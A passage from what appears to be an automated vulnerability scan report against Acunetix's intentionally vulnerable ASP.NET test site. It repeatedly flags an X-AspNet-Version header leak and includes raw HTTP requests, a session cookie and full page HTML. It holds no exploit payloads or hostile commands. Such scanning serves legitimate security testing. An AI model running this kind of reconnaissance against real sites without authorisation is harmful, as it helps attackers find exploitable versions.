analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 17888Response body (17888 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/rssFeed.aspx
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (220 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 2118Response body (2118 bytes)
